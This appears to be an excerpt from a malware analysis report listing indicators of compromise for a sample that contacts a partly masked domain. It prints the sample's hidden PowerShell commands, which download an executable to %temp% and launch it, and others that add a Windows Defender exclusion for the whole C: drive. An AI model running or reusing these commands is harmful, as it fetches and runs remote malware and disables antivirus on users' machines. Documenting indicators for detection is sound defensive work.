Technical Information
- http://cm###owser.live/windows.exe as %temp%\process.exe
- 'cm###owser.live':80
- 'cm###owser.live':443
- http://cm###owser.live/Windows.exe
- 'cm###owser.live':443
- DNS ASK cm###owser.live
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -windowstyle hidden -Command Add-MpPreference -ExclusionPath C:\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -windowstyle hidden -Command Add-MpPreference -ExclusionPath C:\
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -Command Add-MpPreference -ExclusionPath C:\
- '<SYSTEM32>\cmd.exe' /c powershell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://cm###owser.live/Windows.exe','%temp%\process.exe');Start-Process '%temp%\process.exe'